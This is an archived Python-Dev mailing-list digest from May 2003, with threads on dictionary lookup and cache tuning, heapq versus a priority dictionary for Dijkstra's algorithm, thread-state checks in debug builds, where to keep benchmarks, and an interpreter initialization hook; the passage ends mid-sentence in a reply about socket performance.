From tim.one@comcast.net  Thu May  1 03:13:46 2003
From: tim.one@comcast.net (Tim Peters)
Date: Wed, 30 Apr 2003 22:13:46 -0400
Subject: [Python-Dev] Dictionary tuning
In-Reply-To: <001101c30f2a$216954a0$b1b3958d@oemcomputer>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEJOEEAB.tim.one@comcast.net>

[Raymond Hettinger]
> ...
> I worked on similar approaches last month and found them wanting.
> The concept was that a 64-byte cache line held 5.3 dict entries and
> that probing those was much less expensive than making a random
> probe into memory outside of the cache.
>
> The first thing I learned was that the random probes were necessary
> to reduce collisions.  Checking the adjacent space is like a single
> step of linear chaining; it increases the number of collisions.

Yes, I believe that any regularity will.

> That would be fine if the cost were offset by decreased memory
> access time; however, for small dicts, the whole dict is already
> in cache and having more collisions degrades performance
> with no compensating gain.
>
> The next bright idea was to have a separate lookup function for
> small dicts and for larger dictionaries.  I set the large dict lookup
> to search adjacent entries.  The good news is that an artificial
> test of big dicts showed a substantial improvement (around 25%).
> The bad news is that real programs were worse-off than before.

You should qualify that to "some real programs", or perhaps "all real
programs I've tried".  On the other side, I have real programs that access
large dicts in random order, so if you tossed those into your mix, a 25%
gain on those would more than wipe out the 1-2% losses you saw elsewhere.

> A day of investigation showed the cause.  The artificial test
> accessed keys randomly and showed the anticipated benefit. However,
> real programs access some keys more frequently than others
> (I believe Zipf's law applies.)

Some real programs do, and, for all I know, most real programs.  It's not
the case that all real programs do.  The counterexamples that sprang
instantly to my mind are those using dicts to accumulate stats for testing
random number generators.  Those have predictable access patterns only when
the RNG they're testing sucks <wink>.

> Those keys *and* their collision chains are likely already in the cache.
> So, big dicts had the same limitation as small dicts:  You always lose
> when you accept more collisions in return for exploiting cache locality.

Apart from that "always" ain't always so, I really like that as a summary!

> The conclusion was clear, the best way to gain performance
> was to have fewer collisions in the first place.  Hence, I
> resumed experiments on sparsification.

How many collisions are you seeing?  For int-keyed dicts, all experiments I
ran said Python's dicts collided less than a perfectly random hash table
would collide (the reason is explained in dictobject.c: int-keyed dicts
tend to use a contiguous range of ints as keys).

For string-keyed dicts, extensive experiments said collision behavior was
indistinguishable from a perfectly random hash table.
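
For concreteness, here's a rough sketch of that kind of collision count
(an illustration only, not the actual experiment; it assumes the probe
recurrence from dictobject.c that's quoted further down, with
PERTURB_SHIFT == 5):

def count_extra_probes(keys, size):
    # Insert each key's hash into an open-address table whose size is a
    # power of two, counting how many extra probes the insertions need.
    mask = size - 1
    slots = [None] * size
    extra = 0
    for k in keys:
        h = hash(k) & 0xffffffff    # emulate C's unsigned arithmetic
        perturb = h
        i = h & mask
        while slots[i] is not None:
            extra += 1
            i = ((i << 2) + i + perturb + 1) & mask
            perturb >>= 5
        slots[i] = k
    return extra

# Contiguous int keys land in distinct slots (no extra probes at all),
# while string keys behave like a random table:
#     count_extra_probes(range(500), 1024)
#     count_extra_probes([str(n) for n in range(500)], 1024)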

I never cared enough about other kinds of keys to time 'em, at least not
since systematic flaws were fixed in the tuple and float hash functions
(e.g., the tuple hash function used to xor the tuple's elements' hash codes,
so that all permutations of a given tuple had the same hash code; that's
necessary for unordered sets, but tuples are ordered).

>> If someone wants to experiment with that in lookdict_string(),
>> stick a new
>>
>>     ++i;
>>
>> before the for loop, and move the existing
>>
>> i = (i << 2) + i + perturb + 1;
>>
>> to the bottom of that loop.  Likewise for lookdict().

> PyStone gains 1%.
> PyBench loses a 1%.
> timecell gains 2%     (spreadsheet benchmark)
> timemat loses 2%     (pure python matrix package benchmark)
> timepuzzle loses 1% (class based graph traverser)

You'll forgive me if I'm skeptical:  they're such small differences that, if
I saw them, I'd consider them to be a wash -- in the noise.  What kind of
platform are you running on that has timing behavior repeatable enough to
believe 1-2% blips?

> P.S.  There is one other way to improve cache behavior
> but it involves touching code throughout dictobject.c.

Heh -- that wouldn't even be considered a minor nuisance to the truly
obsessed <wink>.

> Move the entry values into a separate array from the
> key/hash pairs.  That way, you get 8 entries per cache line.

What use case would that help?  You said before that small dicts are all in
cache anyway, so it wouldn't help those.  The jumps in large dicts are so
extreme that it doesn't seem to matter if the cache line size du jour holds
1 slot or 100.  To the contrary, at the end of the large dict lookup, it
sounds like it would incur an additional cache miss to fetch the value after
the key was found (since that value would no longer ever ride along with the
key and hashcode).

I can think of a different reason for considering this:  sets have no use
for the value slot, and wouldn't need to allocate space for 'em.

> P.P.S.  One other idea is to use a different search pattern
> for small dictionaries.  Store entries in a self-organizing list
> with no holes.  Dummy fields aren't needed which saves
> a test in the linear search loop.  When an entry is found,
> move it one closer to the head of the list so that the most
> common entries get found instantly.

I don't see how more than just one can be found instantly; if "instantly"
here means "in no more than a few tries", that's usually true of dicts
too -- but is still an odd meaning for "instantly" <wink>.

> Since there are no holes, all eight cells can be used instead of the
> current maximum of five.  Like the current arrangement, the
> whole small dict fits into just two cache lines.

Neil Schemenauer suggested that a few years ago, but I don't recall it going
anywhere.  I don't know how to predict for which apps it would be faster.
If people are keen to optimize very small search tables, think about schemes
that avoid the expense of hashing too.
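
A toy sketch of that kind of scheme, for the curious (illustrative only:
a short Python list stands in for the eight-cell table, there's no
hashing, no holes, and each hit moves the entry one step toward the head):

class SmallTable:
    def __init__(self):
        self.entries = []            # (key, value) pairs; no holes, no dummies

    def lookup(self, key):
        entries = self.entries
        for i, (k, v) in enumerate(entries):
            if k == key:
                if i:                # transpose: one step closer to the head
                    entries[i-1], entries[i] = entries[i], entries[i-1]
                return v
        raise KeyError(key)

    def insert(self, key, value):
        for i, (k, _) in enumerate(self.entries):
            if k == key:
                self.entries[i] = (key, value)
                return
        self.entries.append((key, value))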



From tim.one@comcast.net  Thu May  1 03:36:22 2003
From: tim.one@comcast.net (Tim Peters)
Date: Wed, 30 Apr 2003 22:36:22 -0400
Subject: [Python-Dev] Dictionary tuning
In-Reply-To: <002301c30f55$245394c0$125ffea9@oemcomputer>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEKAEEAB.tim.one@comcast.net>

[Raymond Hettinger]
> ...
> I'm going to write-up an informational PEP to summarize the
> results of research to-date.

I'd suggest instead a text file checked into the Objects directory, akin to
the existing listsort.txt -- it's only of interest to the small fraction of
hardcore developers with an optimizing bent.

> After the first draft, I'm sure the other experimenters will each have
> lessons to share.  In addition, I'll attach a benchmarking suite and
> dictionary simulator (fully instrumented).  That way, future generations
> can reproduce the results and pick up where we left off.

They probably won't, though.  The kind of people attracted to this kind of
micro-level fiddling revel in recreating this kind of stuff themselves.  For
example, you didn't look hard enough to find the sequence of dict simulators
Christian posted last time he got obsessed with this <wink>.  On the chance
that they might, a plain text file-- or a Wiki page! --is easier to update
than a PEP over time.

The benchmarking suite should also be checked in, and should be very
welcome.  Perhaps it's time for a "benchmark" subdirectory under Lib/test?
It doesn't make much sense even now that pystone and sortperf live directly
in the test directory.

> I've decided that this new process should have a name,
> something pithy, yet magical sounding, so it shall be
> dubbed SCIENCE.

LOL!  But I'm afraid it's not real science unless you first write grant
proposals, and pay a Big Name to agree to be named as Principal
Investigator.  I'll write Uncle Don a letter on your behalf <wink>.



From tim_one@email.msn.com  Thu May  1 04:50:32 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Wed, 30 Apr 2003 23:50:32 -0400
Subject: [Python-Dev] New thread death in test_bsddb3
In-Reply-To: <y91ycusm.fsf@python.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEIFEIAB.tim_one@email.msn.com>

[Thomas Heller]
> ...
> So is the policy now that it is no longer *allowed* to create another
> thread state, while in previous versions there wasn't any choice,
> because there existed no way to get the existing one?

You can still create all the thread states you like; the new check is in
PyThreadState_Swap(), not in PyThreadState_New().

There was always a choice, but previously Python provided no *help* in
keeping track of whether a thread already had a thread state associated with
it.  That didn't stop careful apps from providing their own mechanisms to do
so.

About policy, yes, it appears to be so now, else Mark wouldn't be raising a
fatal error <wink>.  I view it as having always been the policy (from a
good-faith reading of the previous code), just a policy that was too
expensive for Python to enforce.  There are many policies like that, such as
not passing goofy arguments to macros, and not letting references leak.
Python doesn't currently enforce them because it's currently too expensive
to enforce them.  Over time that can change.

> IMO a fatal error is very harsh, especially as there's no problem
> continuing execution - exactly what happens in a release build.

There may or may not be a problem with continued execution -- if you've
associated more than one living thread state with a thread, your app may
very well be fatally confused in a way that's very difficult to diagnose
without this error.

Clearly, I like having fatal errors for dubious things in debug builds.
Debug builds are supposed to help you debug.  If the fatal error here drives
you insane, and you don't want to repair the app code, you're welcome to
change

#if defined(Py_DEBUG)

to

#if 0

in your debug build.

> Not that I am misunderstood: I very much appreciate the work Mark has
> done, and look forward to using it to its fullest extent.

In what way is this error a genuine burden to you?  The only time I've seen
it trigger is in the Berkeley database wrapper, where it pointed out a fine
opportunity to simplify some obscure hand-rolled callback tomfoolery -- and
pointed out that the thread in question did in fact already have a thread
state.  Whether that was correct in all cases is something I don't know --
and don't have to worry about anymore, since the new code reuses the thread
state the thread already had.  The lack of errors in a debug run assures
me that's in good shape now.



From drifty@alum.berkeley.edu  Thu May  1 05:38:39 2003
From: drifty@alum.berkeley.edu (Brett Cannon)
Date: Wed, 30 Apr 2003 21:38:39 -0700 (PDT)
Subject: [Python-Dev] Dictionary tuning
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEKAEEAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCEEKAEEAB.tim.one@comcast.net>
Message-ID: <Pine.SOL.4.55.0304302137050.26287@death.OCF.Berkeley.EDU>

[Tim Peters]

> The benchmarking suite should also be checked in, and should be very
> welcome.  Perhaps it's time for a "benchmark" subdirectory under Lib/test?
> It doesn't make much sense even now that pystone and sortperf live directly
> in the test directory.
>

Works for me.  Can we perhaps decide whether we want to do this in the
near future?  I am going to be writing up module docs for the test package
and if we are going to end up moving them I would like to get this
written into the docs the first time through.

-Brett


From martin@v.loewis.de  Thu May  1 05:10:24 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 01 May 2003 06:10:24 +0200
Subject: [Python-Dev] Initialization hook for extenders
In-Reply-To: <3EB04B03.887CDF7B@llnl.gov>
References: <3EB04B03.887CDF7B@llnl.gov>
Message-ID: <m3k7db5mtr.fsf@mira.informatik.hu-berlin.de>

"Patrick J. Miller" <patmiller@llnl.gov> writes:

> I actually want this to do some MPI initialization to setup a
> single user prompt with broadcast which has to run after
> Py_Initialize() but before the import of readline.

-1. It is easy enough to copy the code of Py_Main, and customize it
for special requirements. The next user may want to have a hook to put
additional command line options into Py_Main, YAGNI.

Regards,
Martin


From tim_one@email.msn.com  Thu May  1 07:13:51 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Thu, 1 May 2003 02:13:51 -0400
Subject: [Python-Dev] Re: heaps
In-Reply-To: <eppstein-C9853A.16204924042003@main.gmane.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEINEIAB.tim_one@email.msn.com>

[Raymond Hettinger]
>> I'm quite pleased with the version already in CVS.  It is a small
>> masterpiece of exposition, sophistication, simplicity, and speed.
>> A class based interface is not necessary for every algorithm.

[David Eppstein]
> It has some elegance, but omits basic operations that are necessary for
> many heap-based algorithms and are not provided by this interface.

I think Raymond was telling you it isn't intended to be "an interface",
rather it's quite up-front about being a collection of functions that
operate directly on a Python list, implementing a heap in a very
straightforward way, and deliberately not trying to hide any of that.  IOW,
it's a concrete data type, not an abstract one.  I asked, and it doesn't
feel like apologizing for being what it is <wink>.

That's not to say Python couldn't benefit from providing an abstract heap
API too, and umpteen different implementations specialized to different
kinds of heap applications.  It is saying that heapq isn't trying to be
that, so pointing out that it isn't falls kinda flat.

> Specifically, the three algorithms that use heaps in my upper-division
> undergraduate algorithms classes are heapsort (for which heapq works
> fine, but you would generally want to use L.sort() instead), Dijkstra's
> algorithm (and its relatives such as A* and Prim), which needs the
> ability to decrease keys, and event-queue-based plane sweep algorithms
> (e.g. for finding all crossing pairs in a set of line segments) which
> need the ability to delete items from other than the top.

Then some of those will want a different implementation of a heap.  The
algorithms in heapq are still suitable for many heap applications, such as
maintaining an N-best list (like retaining only the 10 best-scoring items in
a long sequence), and A* on a search tree (when there's only one path to a
node, decrease-key isn't needed; A* on a graph is harder).

> To see how important the lack of these operations is, I decided to
> compare two implementations of Dijkstra's algorithm.

I don't think anyone claimed-- or would claim --that a heapq is suitable for
all heap purposes.

> The priority-dict implementation from
> http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/119466 takes as
> input a graph, coded as nested dicts {vertex: {neighbor: edge length}}.
> This is a variation of a graph coding suggested in one of Guido's essays
> that, as Raymond suggests, avoids using a separate class based interface.
>
> Here's a simplification of my dictionary-based Dijkstra implementation:
>
> def Dijkstra(G,start,end=None):
>     D = {}   # dictionary of final distances
>     P = {}   # dictionary of predecessors
>     Q = priorityDictionary()   # est.dist. of non-final vert.
>     Q[start] = 0
>     for v in Q:
>         D[v] = Q[v]
>         for w in G[v]:
>             vwLength = D[v] + G[v][w]
>             if w not in D and (w not in Q or vwLength < Q[w]):
>                 Q[w] = vwLength
>                 P[w] = v
>     return (D,P)
>
> Here's a translation of the same implementation to heapq (untested
> since I'm not running 2.3).  Since there is no decrease in heapq, nor
> any way to find and remove old keys,

A heapq *is* a list, so you could loop over the list to find an old object.
I wouldn't recommend that in general <wink>, but it's easy, and if the need
is rare then the advertised fact that a heapq is a plain list can be very
convenient.  Deleting an object from "the interior" still isn't supported
directly, of course.  It's possible to do so efficiently with this
implementation of a heap, but since it doesn't support an efficient way to
find an old object to begin with, there seemed little point to providing an
efficient delete-by-index function.  Here's one such:

import heapq

def delete_obj_at_index(heap, pos):
    lastelt = heap.pop()
    if pos >= len(heap):
        return

    # The rest is a lightly fiddled variant of heapq._siftup.
    endpos = len(heap)
    # Bubble up the smaller child until hitting a leaf.
    childpos = 2*pos + 1    # leftmost child position
    while childpos < endpos:
        # Set childpos to index of smaller child.
        rightpos = childpos + 1
        if rightpos < endpos and heap[rightpos] <= heap[childpos]:
            childpos = rightpos
        # Move the smaller child up.
        heap[pos] = heap[childpos]
        pos = childpos
        childpos = 2*pos + 1
    # The leaf at pos is empty now.  Put lastelt there, and bubble
    # it up to its final resting place (by sifting its parents down).
    heap[pos] = lastelt
    heapq._siftdown(heap, 0, pos)
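
A quick sanity check, using the import and function above (just a usage
sketch):

h = [5, 1, 4, 1, 5, 9, 2, 6]
heapq.heapify(h)
delete_obj_at_index(h, 3)      # drop whatever ended up in slot 3
assert len(h) == 7
assert h[0] == min(h)          # the heap invariant still holds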

> I changed the algorithm to add new tuples for each new key, leaving the
> old tuples in place until they bubble up to the top of the heap.
>
> from heapq import heappush, heappop
>
> def Dijkstra(G,start,end=None):
>     D = {}   # dictionary of final distances
>     P = {}   # dictionary of predecessors
>     Q = [(0,None,start)]  # heap of (est.dist., pred., vert.)
>     while Q:
>         dist,pred,v = heappop(Q)
>         if v in D:
>             continue  # tuple outdated by decrease-key, ignore
>         D[v] = dist
>         P[v] = pred
>         for w in G[v]:
>             heappush(Q, (D[v] + G[v][w], v, w))
>     return (D,P)
>
> My analysis of the differences between the two implementations:
>
> - The heapq version is slightly complicated (the two lines
> if...continue) by the need to explicitly ignore tuples with outdated
> priorities.  This need for inserting low-level data structure
> maintenance code into higher-level algorithms is intrinsic to using
> heapq, since its data is not structured in a way that can support
> efficient decrease key operations.

It surprised me that you tried using heapq at all for this algorithm.  I was
also surprised that you succeeded <0.9 wink>.

> - Since the heap version had no way to determine when a new key was
> smaller than an old one, the heapq implementation needed two separate
> data structures to maintain predecessors (middle elements of tuples for
> items in queue, dictionary P for items already removed from queue).  In
> the dictionary implementation, both types of items stored their
> predecessors in P, so there was no need to transfer this information
> from one structure to another.
>
> - The dictionary version is slightly complicated by the need to look up
> old heap keys and compare them with the new ones instead of just
> blasting new tuples onto the heap.  So despite the more-flexible heap
> structure of the dictionary implementation, the overall code complexity
> of both implementations ends up being about the same.
>
> - Heapq forced me to build tuples of keys and items, while the
> dictionary based heap did not have the same object-creation overhead
> (unless it's hidden inside the creation of dictionary entries).

Rest easy, it's not.

> On the other hand, since I was already building tuples, it was
> convenient to also store predecessors in them instead of in some
> other structure.
>
> - The heapq version uses significantly more storage than the dictionary:
> proportional to the number of edges instead of the number of vertices.
>
> - The changes I made to Dijkstra's algorithm in order to use heapq might
> not have been obvious to a non-expert; more generally I think this lack
> of flexibility would make it more difficult to use heapq for
> cookbook-type implementation of textbook algorithms.

Depends on the specific algorithms in question, of course.  No single heap
implementation is the best choice for all algorithms, and heapq would be
misleading people if, e.g., it did offer a decrease_key function -- it
doesn't support an efficient way to do that, and it doesn't pretend to.

> - In Dijkstra's algorithm, it was easy to identify and ignore outdated
> heap entries, sidestepping the inability to decrease keys.  I'm not
> convinced that this would be as easy in other applications of heaps.

All that is explaining why this specific implementation of a heap isn't
suited to the task at hand.  I don't believe that was at issue, though.  An
implementation of a heap that is suited for this task may well be less
suited for other tasks.

> - One of the reasons to separate data structures from the algorithms
> that use them is that the data structures can be replaced by ones with
> equivalent behavior, without changing any of the algorithm code.  The
> heapq Dijkstra implementation is forced to include code based on the
> internal details of heapq (specifically, the line initializing the heap
> to be a one element list), making it less flexible for some uses.
> The usual reason one might want to replace a data structure is for
> efficiency, but there are others: for instance, I teach various
> algorithms classes and might want to use an implementation of Dijkstra's
> algorithm as a testbed for learning about different priority queue data
> structures.  I could do that with the dictionary-based implementation
> (since it shows nothing of the heap details) but not the heapq one.

You can wrap any interface you like around heapq (that's very easy to do in
Python), but it won't change that heapq's implementation is poorly suited to
this application.  priorityDictionary looks like an especially nice API for
this specific algorithm, but, e.g., impossible to use directly for
maintaining an N-best queue (priorityDictionary doesn't support multiple
values with the same priority, right?  if we're trying to find the 10,000
poorest people in America, counting only one as dead broke would be too
Republican for some people's tastes <wink>).  OTOH, heapq is easy and
efficient for *that* class of heap application.
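
For example, a minimal sketch of that kind of N-smallest queue with heapq
(illustrative only:  it stores negated incomes so the min-heap's root is
the current cutoff, and duplicate incomes ride along just fine):

from heapq import heappush, heapreplace

def n_poorest(people, n):
    # people yields (income, name) pairs; returns the n smallest incomes,
    # ties and duplicates included.
    heap = []                                  # holds (-income, name)
    for income, name in people:
        if len(heap) < n:
            heappush(heap, (-income, name))
        elif -income > heap[0][0]:             # below the current cutoff
            heapreplace(heap, (-income, name))
    return sorted([(-neg, name) for neg, name in heap])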

> Overall, while heapq was usable for implementing Dijkstra, I think it
> has significant shortcomings that could be avoided by a more
> well-thought-out interface that provided a little more functionality and
> a little clearer separation between interface and implementation.

heapq isn't trying to separate them at all -- quite the contrary!  It's much
like the bisect module that way.  They find very good uses in practice.

I should note that I objected to heapq at the start, because there are
several important heap implementation techniques, and just one doesn't fit
anyone all the time.  My objection went away when Guido pointed out how much
like bisect it is:  since it doesn't pretend one whit to generality or
opaqueness, it can't be taken as promising more than it actually does, nor
can it interfere with someone (so inclined) defining a general heap API:
it's not even a class, just a handful of functions.  Useful, too, just as it
is.  A general heap API would be nice, but it wouldn't have much (possibly
nothing) to do with heapq.



From eppstein@ics.uci.edu  Thu May  1 07:36:17 2003
From: eppstein@ics.uci.edu (David Eppstein)
Date: Wed, 30 Apr 2003 23:36:17 -0700
Subject: [Python-Dev] Re: heaps
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEINEIAB.tim_one@email.msn.com>
References: <LNBBLJKPBEHFEDALKOLCEEINEIAB.tim_one@email.msn.com>
Message-ID: <5841710.1051745776@[10.0.1.2]>

On 5/1/03 2:13 AM -0400 Tim Peters <tim_one@email.msn.com> wrote:
> It surprised me that you tried using heapq at all for this algorithm.  I
> was also surprised that you succeeded <0.9 wink>.

Wink noted, but it surprised me too, a little.  I had thought decrease key 
was a necessary part of the algorithm, not something that could be finessed 
like that.

> You can wrap any interface you like around heapq (that's very easy to do
> in Python), but it won't change that heapq's implementation is poorly
> suited to this application.  priorityDictionary looks like an especially
> nice API for this specific algorithm, but, e.g., impossible to use
> directly for maintaining an N-best queue (priorityDictionary doesn't
> support multiple values with the same priority, right?  if we're trying
> to find the 10,000 poorest people in America, counting only one as dead
> broke would be too Republican for some peoples' tastes <wink>).  OTOH,
> heapq is easy and efficient for *that* class of heap application.

I agree with your main points (heapq's inability to handle certain priority 
queue applications doesn't mean it's useless, and its 
implementation-specific API helps avoid fooling programmers into thinking 
it's any more than what it is).  But I am confused at this example.  Surely 
it's just as easy to store (income,identity) tuples in either data 
structure.

If you mean, you want to find the 10k smallest income values (rather than 
the people having those incomes), then it may be that a better data 
structure would be a simple list L in which the value of L[i] is the count 
of people with income i.
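
Something like this, assuming incomes are small non-negative integers
(again just a sketch):

def poorest_incomes(incomes, n):
    counts = [0] * (max(incomes) + 1)
    for income in incomes:
        counts[income] += 1
    result = []
    for income, c in enumerate(counts):
        result.extend([income] * min(c, n - len(result)))
        if len(result) == n:
            break
    return result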

-- 
David Eppstein                      http://www.ics.uci.edu/~eppstein/
Univ. of California, Irvine, School of Information & Computer Science



From guido@python.org  Thu May  1 14:28:24 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 01 May 2003 09:28:24 -0400
Subject: [Python-Dev] Dictionary tuning
In-Reply-To: Your message of "Wed, 30 Apr 2003 21:38:39 PDT."
 <Pine.SOL.4.55.0304302137050.26287@death.OCF.Berkeley.EDU>
References: <LNBBLJKPBEHFEDALKOLCEEKAEEAB.tim.one@comcast.net>
 <Pine.SOL.4.55.0304302137050.26287@death.OCF.Berkeley.EDU>
Message-ID: <200305011328.h41DSPq05585@odiug.zope.com>

[Tim]
> > The benchmarking suite should also be checked in, and should be
> > very welcome.  Perhaps it's time for a "benchmark" subdirectory
> > under Lib/test?  It doesn't make much sense even now that pystone
> > and sortperf live directly in the test directory.

> Works for me.  Can we perhaps decide whether we want to do this in the
> near future?  I am going to be writing up module docs for the test package
> and if we are going to end up moving them I would like to get this
> written into the docs the first time through.
> 
> -Brett

Should the benchmarks directory be part of the distribution, or should
it be in the nondist part of the CVS tree?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mwh@python.net  Thu May  1 15:07:37 2003
From: mwh@python.net (Michael Hudson)
Date: Thu, 01 May 2003 15:07:37 +0100
Subject: [Python-Dev] Dictionary tuning
In-Reply-To: <200305011328.h41DSPq05585@odiug.zope.com> (Guido van Rossum's
 message of "Thu, 01 May 2003 09:28:24 -0400")
References: <LNBBLJKPBEHFEDALKOLCEEKAEEAB.tim.one@comcast.net>
 <Pine.SOL.4.55.0304302137050.26287@death.OCF.Berkeley.EDU>
 <200305011328.h41DSPq05585@odiug.zope.com>
Message-ID: <2m65ouahg6.fsf@starship.python.net>

Guido van Rossum <guido@python.org> writes:

> [Tim]
>> > The benchmarking suite should also be checked in, and should be
>> > very welcome.  Perhaps it's time for a "benchmark" subdirectory
>> > under Lib/test?  It doesn't make much sense even now that pystone
>> > and sortperf live directly in the test directory.
>
>> Works for me.  Can we perhaps decide whether we want to do this in the
>> near future?  I am going to be writing up module docs for the test package
>> and if we are going to end up moving them I would like to get this
>> written into the docs the first time through.
>> 
>> -Brett
>
> Should the benchmarks directory be part of the distribution, or should
> it be in the nondist part of the CVS tree?

I can't think why you'd want it in nondist, unless they depend on huge
input files or something.

Cheers,
M.

-- 
  Those who have deviant punctuation desires should take care of their
  own perverted needs.                  -- Erik Naggum, comp.lang.lisp


From guido@python.org  Thu May  1 15:18:50 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 01 May 2003 10:18:50 -0400
Subject: [Python-Dev] Dictionary tuning
In-Reply-To: Your message of "Thu, 01 May 2003 15:07:37 BST."
 <2m65ouahg6.fsf@starship.python.net>
References: <LNBBLJKPBEHFEDALKOLCEEKAEEAB.tim.one@comcast.net> <Pine.SOL.4.55.0304302137050.26287@death.OCF.Berkeley.EDU> <200305011328.h41DSPq05585@odiug.zope.com>
 <2m65ouahg6.fsf@starship.python.net>
Message-ID: <200305011418.h41EIoF07682@odiug.zope.com>

> > Should the benchmarks directory be part of the distribution, or should
> > it be in the nondist part of the CVS tree?
> 
> I can't think why you'd want it in nondist, unless they depend on huge
> input files or something.

OK.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From aahz@pythoncraft.com  Thu May  1 15:20:35 2003
From: aahz@pythoncraft.com (Aahz)
Date: Thu, 1 May 2003 10:20:35 -0400
Subject: [Python-Dev] Dictionary tuning
In-Reply-To: <200305011328.h41DSPq05585@odiug.zope.com>
References: <LNBBLJKPBEHFEDALKOLCEEKAEEAB.tim.one@comcast.net> <Pine.SOL.4.55.0304302137050.26287@death.OCF.Berkeley.EDU> <200305011328.h41DSPq05585@odiug.zope.com>
Message-ID: <20030501142034.GA28364@panix.com>

On Thu, May 01, 2003, Guido van Rossum wrote:
>
> Should the benchmarks directory be part of the distribution, or should
> it be in the nondist part of the CVS tree?

Given the constant number of arguments in c.l.py about speed, I'd keep
it in the distribution unless/until it gets large.
-- 
Aahz (aahz@pythoncraft.com)           <*>         http://www.pythoncraft.com/

"In many ways, it's a dull language, borrowing solid old concepts from
many other languages & styles:  boring syntax, unsurprising semantics,
few automatic coercions, etc etc.  But that's one of the things I like
about it."  --Tim Peters on Python, 16 Sep 93


From tjreedy@udel.edu  Thu May  1 16:27:34 2003
From: tjreedy@udel.edu (Terry Reedy)
Date: Thu, 1 May 2003 11:27:34 -0400
Subject: [Python-Dev] Re: Dictionary tuning
References: <LNBBLJKPBEHFEDALKOLCEEKAEEAB.tim.one@comcast.net><Pine.SOL.4.55.0304302137050.26287@death.OCF.Berkeley.EDU><200305011328.h41DSPq05585@odiug.zope.com> <2m65ouahg6.fsf@starship.python.net>
Message-ID: <b8re5u$82t$1@main.gmane.org>

From my curious user viewpoint ...

"Michael Hudson" <mwh@python.net> wrote in message
news:2m65ouahg6.fsf@starship.python.net...
> Guido van Rossum <guido@python.org> writes:
>
> > [Tim]
> >> > The benchmarking suite should also be checked in, and should be
> >> > very welcome.  Perhaps it's time for a "benchmark" subdirectory
> >> > under Lib/test?  It doesn't make much sense even now that pystone
> >> > and sortperf live directly in the test directory.

+ 1 on a separate subdirectory (there are two others already) to make
these easier to find (or ignore).

> >> Works for me.  Can we perhaps decide whether we want to do this in the
> >> near future?  I am going to be writing up module docs for the test package
> >> and if we are going to end up moving them I would like to get this
> >> written into the docs the first time through.

+ 1 on doing so by 2.3 final if not before

> > Should the benchmarks directory be part of the distribution, or should
> > it be in the nondist part of the CVS tree?
>
> I can't think why you'd want it in nondist, unless they depend on huge
> input files or something.

+ 1 on keeping these with the standard distribution.  Sortperf.py is a
great example of random + systematic corner case testing extended to
something more complicated than binary ops.  Besides that, I expect to
actually use it, with minor mods, sometime later this year.  I am more
than happy to give it the 4K bytes it uses.

Terry J. Reedy





From patmiller@llnl.gov  Thu May  1 16:23:07 2003
From: patmiller@llnl.gov (Patrick J. Miller)
Date: Thu, 01 May 2003 08:23:07 -0700
Subject: [Python-Dev] Initialization hook for extenders
References: <3EB04B03.887CDF7B@llnl.gov> <m3k7db5mtr.fsf@mira.informatik.hu-berlin.de>
Message-ID: <3EB13BDB.808E749@llnl.gov>

"Martin v. Löwis" wrote:
> -1. It is easy enough to copy the code of Py_Main, and customize it
> for special requirements. The next user may want to have a hook to put
> additional command line options into Py_Main, YAGNI.

It's not easy.

Not if you simply want to link against an installed Python.

Nor is it easy if you want to build against 2.1, 2.2, and 2.3 ... libraries.

There are subtle changes that bite you in the ass if you don't
physically copy the right source forward.

We did copy forward main.c, but found that every time we updated
Python, we had to "rehack" main to make sure we had all the options
and flags and initialization straight.

I think the hook is extremely cheap, very short, looks almost exactly
like Py_AtExit() and solves the problem directly.

Pat



-- 
Patrick Miller | (925) 423-0309 |
http://www.llnl.gov/CASC/people/pmiller

You can discover more about a person in an hour of play than in a year of
discussion. -- Plato, philosopher (427-347 BCE)


From glyph@twistedmatrix.com  Thu May  1 16:59:41 2003
From: glyph@twistedmatrix.com (Glyph Lefkowitz)
Date: Thu, 1 May 2003 10:59:41 -0500
Subject: [Python-Dev] Re: Python-Dev digest, Vol 1 #3221 - 4 msgs
In-Reply-To: <200304282102.h3SL2rW18842@odiug.zope.com>
Message-ID: <EB0B6712-7BED-11D7-B27C-000393C9700E@twistedmatrix.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Monday, April 28, 2003, at 04:02 PM, Guido van Rossum wrote:

>> Why is the Python development team introducing bugs into Python and
>> then expecting the user community to fix things that used to work?
>
> I resent your rhetoric, Glyph.  Had you read the rest of this thread,
> you would have seen that the performance regression only happens for
> sending data at maximum speed over the loopback device, and is
> negligible when receiving e.g. data over a LAN.  You would also have
> seen that I have already suggested two different simple fixes.

I apologize.  I did not seriously mean this as an indictment of the 
entire Python development team or process.  I would have responded to 
this effect sooner, but I've been swamped with work.

>> I could understand not wanting to put a lot of effort into
>> correcting obscure or difficult-to-find performance problems that
>> only a few people care about, but the obvious thing to do in this
>> case is simply to change the default behavior.
>
> It can and will be fixed.  I just don't have the time to fix it
> myself.

I noticed your comment about the checkin.  Thanks to the dev team for 
fixing it so promptly.

>> I think this should be in the release notes for 2.3.  "Python is 10%
>> faster, unless you use sockets, in which case it is much, much slower.
>> Do the following in order to regain lost performance and retain the
>> same semantics:"
>
> That is total bullshit, Glyph, and you know it.

Please pardon the exaggeration.  I forget that sarcasm does not come 
across as well on e-mail as it does on IRC.  I appreciate that the 
performance drop wasn't really that serious.

On a more positive note, looking at performance numbers got us thinking 
about increasing performance in Twisted.  Anthony Baxter has been very 
helpful with profiling information, Itamar's already written some 
benchmarking tests, and I finished up a logging infrastructure that is 
more amenable to metrics gathering last night.  (It's also less 
completely awful than the one we had before and should hook up to the 
new logging.py gracefully.)

We already have an always-on multi-platform regression test suite for 
Twisted (not the snake farm):

	http://www.twistedmatrix.com/users/warner.twistd/

If we get this reporting some performance numbers as well, it would be 
pretty easy to turn it into a regression/performance test for Python by 
